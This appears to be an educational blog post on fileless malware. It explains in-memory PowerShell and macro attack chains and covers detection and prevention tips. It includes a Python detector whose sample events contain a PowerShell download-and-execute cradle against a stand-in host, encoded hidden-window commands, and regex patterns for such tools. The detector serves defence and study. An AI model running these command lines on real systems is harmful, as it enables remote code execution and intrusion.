FILELESS MALWARE ATTACKS : INTRO

FILELESS MALWARE ATTACKS

Unlike attacks carried out using traditional malware, fileless malware attacks don’t entail attackers installing software on a victim’s machine. This means that there’s NO signature for antivirus software to detect, greatly decreasing the effectiveness of these programs in detecting fileless malware attacks. And these attacks are almost 10 times more likely to succeed in infecting a machine than file-based attacks.

(Animated image: threat actors)

PS: Educational purposes 🙏 NOT endorsement

How Fileless Malware works


Source: Emsisoft

TRUE FILELESS MALWARE IS NON-PERSISTENT — ALL TRACES OF IT DISAPPEAR WHEN THE SYSTEM IS REBOOTED, MAKING FORENSIC INVESTIGATION DIFFICULT.

The notion of fileless malware has been gaining a lot of attention in the industry.


The majority of successful attacks are now fileless. Source: The Ponemon Institute


In-Depth Approach

Unlike file-based attacks, fileless malware attacks DO NOT download malicious files or write content to disk. Attackers exploit application vulnerabilities to inject code directly into the memory space of an existing application. They can also leverage trusted office applications or administration tools native to the Windows OS, such as PowerShell or Windows Management Instrumentation (WMI), to run scripts and load malicious code directly into memory. As with any attack, the goal is to gain control of computers in order to achieve the attacker’s objective, such as destruction, distortion (ransomware), data or credential theft, or further attacks.

(Figure: fileless attack chain. Source: Bitdefender)

As in the example illustrated above, a phishing email containing a link takes the user to an exploit-hosting site. The browser exploit launches PowerShell with a command line (script); PowerShell then follows those instructions to download an additional script (typically a larger command line) from a remote site. The larger command line contains the fileless malware, which is assembled and run directly in memory.

In a second example, a user may receive a phishing email with a .doc attachment containing a macro. If the user enables the macro (essentially a VBA script), it launches a PowerShell script that downloads additional scripts containing the fileless malware code from a remote location. That malicious code is then injected into the memory space of a vulnerable application.

Must read: how a hacker broke into the financial domain: https://d3pakblog.wordpress.com/2017/03/09/hacker-hacked-into-financial-domain/

69% of organizations don’t believe their antivirus can stop the threats they’re seeing.

Investigation Approach


Cyber Kill Chain: The seven steps of the Cyber Kill Chain enhance visibility into an attack and enrich an analyst’s understanding of an adversary’s tactics, techniques, and procedures.


Can Fileless Malware Be Stopped?

The risk of ransomware penetration and the business impact of a ransomware infection can both be reduced by implementing several conventional best practices. These can be split into two categories: general good practice and security best practice. These baseline protections are strongly recommended for any organization.

The problem is complex. To begin with, organizations have to realize that processes that run scripts, such as Microsoft PowerShell, are just as capable of delivering malware as processes that execute files, such as opening a PDF. Secondly, companies must make sure that their employees are educated about the dangers of opening ANY attachment that isn’t from a known sender, and third, every patch issued by any vendor must be installed immediately. This includes, of course, the antivirus software on the system as well as the operating system itself. Simple steps like these can prevent a lot of future pain. According to McAfee, fileless threats continued to be a growing concern in Q3, with PowerShell malware growing by 119%.

Against emerging threats like ransomware, the primary best practices are education and awareness, data backup, and patching and updates.

Challenges

Fileless malware already presents a significant problem, and it’s gaining further popularity among attackers because it is virtually undetectable by traditional file-based prevention and detection techniques. Endpoint security tools, including so-called next-gen AV, don’t scrutinize scripts or command lines, such as PowerShell scripts, and no file is written to disk. Since traditional AV and so-called next-gen AV focus on static file analysis, fileless attacks can evade these AV tools without triggering alarms because no file is downloaded and saved to the disk.

Blocking File-Less Attacks

  1. Machine learning and algorithms: flag suspicious traffic and file downloads
  2. Process inspection: review policies for specific arguments to PowerShell, mshta, wscript, cscript, rundll, AutoIt, regedit and Office macros, and for a browser spawning PowerShell or any process injecting code into another process’s memory space
  3. Retrospective detection: collect as many IoCs/IoAs (indicators of compromise/attack) as possible relating to the threat campaign
  4. Studying the adversaries: use an intelligence baseline and seek out known tactics, techniques and procedures (TTPs) used by multiple adversarial groups
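A small detection example for the process-inspection item above (and for the browser-to-PowerShell and macro-to-PowerShell chains described earlier). This is added here and is not code from the original post or from any vendor it cites; the Sysmon-style field names, the sample events and the scoring threshold are my own assumptions.

```python
import re

# Constructed process-creation events in the style of Sysmon Event ID 1
# (parent image, child image, command line). Sample values made up for
# this example, not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand AAAAAAAA"},
    {"parent": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe javascript:alert(1)"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
]

# Script hosts the post's process-inspection item names, plus the parents
# whose children deserve a closer look (assumed lists, extend as needed).
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}

# Command-line features typical of in-memory download-and-execute chains.
ARG_PATTERNS = {
    "encoded-command": re.compile(r"\s-e(nc|ncodedcommand)?\s", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no-profile": re.compile(r"-nop(rofile)?\b", re.I),
    "download-cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression", re.I),
    "inline-script": re.compile(r"\b(javascript|vbscript):", re.I),
}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def inspect(event: dict) -> list:
    """Return the indicators that make one event look like a fileless chain."""
    reasons = []
    child, parent = basename(event["image"]), basename(event["parent"])
    if child in SCRIPT_HOSTS:
        reasons.append(f"script-host:{child}")
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append(f"office-spawn:{parent}")
    if parent in BROWSERS and child in SCRIPT_HOSTS:
        reasons.append(f"browser-spawn:{parent}")
    reasons += [name for name, pat in ARG_PATTERNS.items() if pat.search(event["cmdline"])]
    return reasons

def triage(events, threshold: int = 2) -> list:
    """Flag events with at least `threshold` indicators; a lone script host is normal admin use."""
    return [(i, r) for i, ev in enumerate(events) if len(r := inspect(ev)) >= threshold]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
```

The threshold keeps an administrator running a plain `powershell.exe -File` from Explorer out of the alert queue while still catching Office or browser parents and the encoded, hidden or download-cradle arguments the post lists.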

Read case study: the vigilante who hacked Hacking Team: https://d3pakblog.wordpress.com/2017/01/07/the-vigilante-who-hacked-hacking-team/

The SANS Security Maturity Model

The SANS Institute has developed a Maturity Model for Endpoint Security that clearly lays out a progression of defensive capabilities relating to end-user devices, which continue to be the source of approximately 70% of successful malware breaches.

(Figure: SANS Maturity Model for Endpoint Security)

Source: https://www.bromium.com/wp-content/uploads/2018/03/Bromium-Securing-the-Modern-Endpoint-White-Paper_2018.pdf

Some tips to avoid fileless malware infections, from TechRepublic:

  1. Restrict unnecessary scripting languages
  2. Disable macros and digitally sign trusted macros
  3. Monitor security appliance logs for unauthorized traffic
  4. Implement endpoint security with active monitoring
  5. Perform patch management across all devices

Following the security measures above reduces the chances of falling into a trap.


Some References

  • Fileless Malware Tips

https://www.apriorit.com/dev-blog/517-fileless-malware-protection-tips

  • Hiding Metasploit Shellcode to Evade Windows Defender

https://blog.rapid7.com/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/

  • Decoding Fileless Malware

http://resources.infosecinstitute.com/decoding-fileless-malware/#gref

  • Fileless malware: the ninja technique to spread malware using default OS tools

http://blog.securelayer7.net/fileless-malware-ninja-technique-spread-malwares-using-default-os-tools/

  • Fileless Malware: Attack Trend Exposed

http://blog.morphisec.com/fileless-malware-attack-trend-exposed

  • FILELESS MALWARE 101: UNDERSTANDING NON-MALWARE ATTACKS

https://www.cybereason.com/blog/fileless-malware

  • Fileless Malware: A Hidden Threat

https://blog.trendmicro.com/fileless-malware-a-hidden-threat/

  • Detecting Malicious PowerShell Commands using Deep Neural Networks

https://arxiv.org/pdf/1804.04177.pdf

  • Extract Shellcode from Fileless Malware like a Pro

https://www.youtube.com/watch?v=jbieGfML0Bs

  • Must read: AGE OF THE CYBER HUNTER: HOW A NEW GENERATION OF THREATS CHANGED THE CYBERSECURITY PARADIGM

https://www.rackspace.com/sites/default/files/white-papers/age-of-the-cyber-hunter-white-paper_1.pdf

Some Courses

  • Malware Analysis

https://www.cybrary.it/course/malware-analysis/

  • A curated list of awesome malware analysis tools and resources

https://github.com/rshipp/awesome-malware-analysis

NEW TREND

Cryptominers have impacted 55% of organizations globally.
